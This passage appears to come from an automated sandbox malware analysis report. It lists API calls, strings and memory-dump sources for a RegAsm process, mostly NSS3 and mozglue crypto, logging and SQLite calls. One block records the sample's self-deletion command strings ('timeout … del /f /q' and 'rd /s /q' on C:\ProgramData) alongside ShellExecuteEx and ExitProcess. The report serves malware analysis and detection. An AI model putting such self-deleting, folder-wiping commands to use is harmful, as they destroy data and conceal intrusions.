                                                                                                        • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C1ECF2F
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000121), ref: 6C1ECF4C
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000400), ref: 6C1ECF69
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000341), ref: 6C1ECF86
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000311), ref: 6C1ECFA3
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000301), ref: 6C1ECFBC
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000331), ref: 6C1ECFD5
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000101), ref: 6C1ECFEE
                                                                                                        • PK11_DoesMechanism.NSS3(?,00000141), ref: 6C1ED007
                                                                                                        • PK11_DoesMechanism.NSS3(?,00001008), ref: 6C1ED021
                                                                                                        Similarity
                                                                                                        • API ID: DoesK11_Mechanism
                                                                                                        • String ID:
                                                                                                        • API String ID: 622698949-0
                                                                                                        APIs
                                                                                                        • PR_Lock.NSS3(?), ref: 6C2C1000
                                                                                                          • Part of subcall function 6C279BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C1A1A48), ref: 6C279BB3
                                                                                                          • Part of subcall function 6C279BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C1A1A48), ref: 6C279BC8
                                                                                                        • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C2C1016
                                                                                                          • Part of subcall function 6C25C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C25C2BF
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C2C1021
                                                                                                          • Part of subcall function 6C25DD70: TlsGetValue.KERNEL32 ref: 6C25DD8C
                                                                                                          • Part of subcall function 6C25DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C25DDB4
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C2C1046
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C2C106B
                                                                                                        • PR_Lock.NSS3 ref: 6C2C1079
                                                                                                        • PR_Unlock.NSS3 ref: 6C2C1096
                                                                                                        • free.MOZGLUE(?), ref: 6C2C10A7
                                                                                                        • free.MOZGLUE(?), ref: 6C2C10B4
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10BF
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10CA
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10D5
                                                                                                        • PR_DestroyCondVar.NSS3(?), ref: 6C2C10E0
                                                                                                        • PR_DestroyLock.NSS3(?), ref: 6C2C10EB
                                                                                                        • free.MOZGLUE(?), ref: 6C2C1105
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
                                                                                                        • String ID:
                                                                                                        • API String ID: 8544004-0
                                                                                                        APIs
                                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C1FEE0B
                                                                                                          • Part of subcall function 6C210BE0: malloc.MOZGLUE(6C208D2D,?,00000000,?), ref: 6C210BF8
                                                                                                          • Part of subcall function 6C210BE0: TlsGetValue.KERNEL32(6C208D2D,?,00000000,?), ref: 6C210C15
                                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C1FEEE1
                                                                                                          • Part of subcall function 6C1F1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C1F1D7E
                                                                                                          • Part of subcall function 6C1F1D50: EnterCriticalSection.KERNEL32(?), ref: 6C1F1D8E
                                                                                                          • Part of subcall function 6C1F1D50: PR_Unlock.NSS3(?), ref: 6C1F1DD3
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1FEE51
                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C1FEE65
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1FEEA2
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEEBB
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FEED0
                                                                                                        • PR_Unlock.NSS3(?), ref: 6C1FEF48
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEF68
                                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C1FEF7D
                                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C1FEFA4
                                                                                                        • free.MOZGLUE(?), ref: 6C1FEFDA
                                                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C1FF055
                                                                                                        • free.MOZGLUE(?), ref: 6C1FF060
                                                                                                        Similarity
                                                                                                        • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2524771861-0
                                                                                                        APIs
                                                                                                        • PK11_SignatureLen.NSS3(?), ref: 6C1C4D80
                                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C1C4D95
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1C4DF2
                                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1C4E2C
                                                                                                        • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C1C4E43
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1C4E58
                                                                                                        • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C1C4E85
                                                                                                        • DER_Encode_Util.NSS3(?,?,6C3105A4,00000000), ref: 6C1C4EA7
                                                                                                        • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C1C4F17
                                                                                                        • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C1C4F45
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1C4F62
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1C4F7A
                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C1C4F89
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C1C4FC8
                                                                                                        Similarity
                                                                                                        • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                        • String ID:
                                                                                                        • API String ID: 2843999940-0
                                                                                                        APIs
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(6C1F9582), ref: 6C1F8F5B
                                                                                                          • Part of subcall function 6C20BE30: SECOID_FindOID_Util.NSS3(6C1C311B,00000000,?,6C1C311B,?), ref: 6C20BE44
                                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C1F8F6A
                                                                                                          • Part of subcall function 6C210FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1B87ED,00000800,6C1AEF74,00000000), ref: 6C211000
                                                                                                          • Part of subcall function 6C210FF0: PR_NewLock.NSS3(?,00000800,6C1AEF74,00000000), ref: 6C211016
                                                                                                          • Part of subcall function 6C210FF0: PL_InitArenaPool.NSS3(00000000,security,6C1B87ED,00000008,?,00000800,6C1AEF74,00000000), ref: 6C21102B
                                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C1F8FC3
                                                                                                        • PK11_GetIVLength.NSS3(-00000001), ref: 6C1F8FE0
                                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C2DD820,6C1F9576), ref: 6C1F8FF9
                                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C1F901D
                                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C1F903E
                                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1F9062
                                                                                                        • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C1F90A2
                                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C1F90CA
                                                                                                        • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C1F90F0
                                                                                                        • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C1F912D
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F9136
                                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C1F9145
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                        • String ID:
                                                                                                        • API String ID: 3626836424-0
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00418296
                                                                                                        • _memset.LIBCMT ref: 004182A5
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                        • _memset.LIBCMT ref: 00418465
                                                                                                        • _memset.LIBCMT ref: 00418477
                                                                                                        • ExitProcess.KERNEL32 ref: 00418487
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                        Strings
                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                        • " & exit, xrefs: 00418389
                                                                                                        • " & exit, xrefs: 004183DA
                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                        • API String ID: 2823247455-1079830800
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C1EADE6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1EAE17
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAE29
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAE3F
                                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C1EAE78
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1EAE8A
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1EAEA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: L_strncpyzPrint$L_strcatn
                                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$n,l
                                                                                                        • API String ID: 332880674-4104680758
                                                                                                        APIs
                                                                                                        • calloc.MOZGLUE(00000001,00000020), ref: 6C2CC8B9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CC8DA
                                                                                                        • malloc.MOZGLUE(00000001), ref: 6C2CC8E4
                                                                                                        • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C2CC8F8
                                                                                                        • PR_NewLock.NSS3 ref: 6C2CC909
                                                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6C2CC918
                                                                                                        • PR_NewCondVar.NSS3(00000000), ref: 6C2CC92A
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • free.MOZGLUE(00000000), ref: 6C2CC947
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2931242645-0
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_InitPIN), ref: 6C1E2DF6
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E2E24
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E2E33
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E2E49
                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C1E2E68
                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C1E2E81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$n,l
                                                                                                        • API String ID: 1003633598-1992001104
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C1E6F16
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E6F44
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6F53
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6F69
                                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C1E6F88
                                                                                                        • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C1E6FA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$n,l
                                                                                                        • API String ID: 1003633598-3552411435
                                                                                                        APIs
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C1AAF47
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790AB
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790C9
                                                                                                          • Part of subcall function 6C279090: EnterCriticalSection.KERNEL32 ref: 6C2790E5
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C279116
                                                                                                          • Part of subcall function 6C279090: LeaveCriticalSection.KERNEL32 ref: 6C27913F
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6C1AAF6D
                                                                                                        • free.MOZGLUE(?), ref: 6C1AAFA4
                                                                                                        • free.MOZGLUE(?), ref: 6C1AAFAA
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C1AAFB5
                                                                                                        • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C1AAFF5
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C1AB005
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C1AB014
                                                                                                        • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C1AB028
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C1AB03C
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                        • String ID: %s decr => %d$Unloaded library %s
                                                                                                        • API String ID: 4015679603-2877805755
                                                                                                        APIs
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C1F781D,00000000,6C1EBE2C,?,6C1F6B1D,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C40
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C1F781D,?,6C1EBE2C,?), ref: 6C1F6C58
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C6F
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C1F6C84
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C1F6C96
                                                                                                          • Part of subcall function 6C1A1240: TlsGetValue.KERNEL32(00000040,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1267
                                                                                                          • Part of subcall function 6C1A1240: EnterCriticalSection.KERNEL32(?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A127C
                                                                                                          • Part of subcall function 6C1A1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1291
                                                                                                          • Part of subcall function 6C1A1240: PR_Unlock.NSS3(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A12A0
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C1F6CAA
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                        • API String ID: 4221828374-3736768024
                                                                                                        APIs
                                                                                                        • PR_SetErrorText.NSS3(00000000,00000000,?,6C1C78F8), ref: 6C204E6D
                                                                                                          • Part of subcall function 6C1A09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C1A06A2,00000000,?), ref: 6C1A09F8
                                                                                                          • Part of subcall function 6C1A09E0: malloc.MOZGLUE(0000001F), ref: 6C1A0A18
                                                                                                          • Part of subcall function 6C1A09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C1A0A33
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C1C78F8), ref: 6C204ED9
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000,00000000), ref: 6C1F5942
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703), ref: 6C1F5954
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F596A
                                                                                                          • Part of subcall function 6C1F5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F5984
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C1F5999
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F59BA
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C1F59D3
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F59F5
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C1F5A0A
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F5A2E
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C1F5A43
                                                                                                        • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204EB3
                                                                                                          • Part of subcall function 6C204820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20484C
                                                                                                          • Part of subcall function 6C204820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20486D
                                                                                                          • Part of subcall function 6C204820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C204EB8,?), ref: 6C204884
                                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204EC0
                                                                                                          • Part of subcall function 6C204470: TlsGetValue.KERNEL32(00000000,?,6C1C7296,00000000), ref: 6C204487
                                                                                                          • Part of subcall function 6C204470: EnterCriticalSection.KERNEL32(?,?,?,6C1C7296,00000000), ref: 6C2044A0
                                                                                                          • Part of subcall function 6C204470: PR_Unlock.NSS3(?,?,?,?,6C1C7296,00000000), ref: 6C2044BB
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F16
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F2E
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F40
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F6C
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F80
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F8F
                                                                                                        • PK11_UpdateSlotAttribute.NSS3(?,6C2DDCB0,00000000), ref: 6C204FFE
                                                                                                        • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C20501F
                                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20506B
                                                                                                        Similarity
                                                                                                        • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 560490210-0
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 786543732-0
                                                                                                        APIs
                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C284CAF
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284CFD
                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C284D44
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                        • API String ID: 2274617401-4033235608
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0A4A68), ref: 6C0D945E
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D9470
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D9482
                                                                                                          • Part of subcall function 6C0D9420: __Init_thread_footer.LIBCMT ref: 6C0D949F
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0DEC84
                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0DEC8C
                                                                                                          • Part of subcall function 6C0D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0D94EE
                                                                                                          • Part of subcall function 6C0D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0D9508
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0DECA1
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DECAE
                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C0DECC5
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DED0A
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C0DED19
                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C0DED28
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0DED2F
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DED59
                                                                                                        Strings
                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C0DEC94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C1E2CEC
                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C1E2D07
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
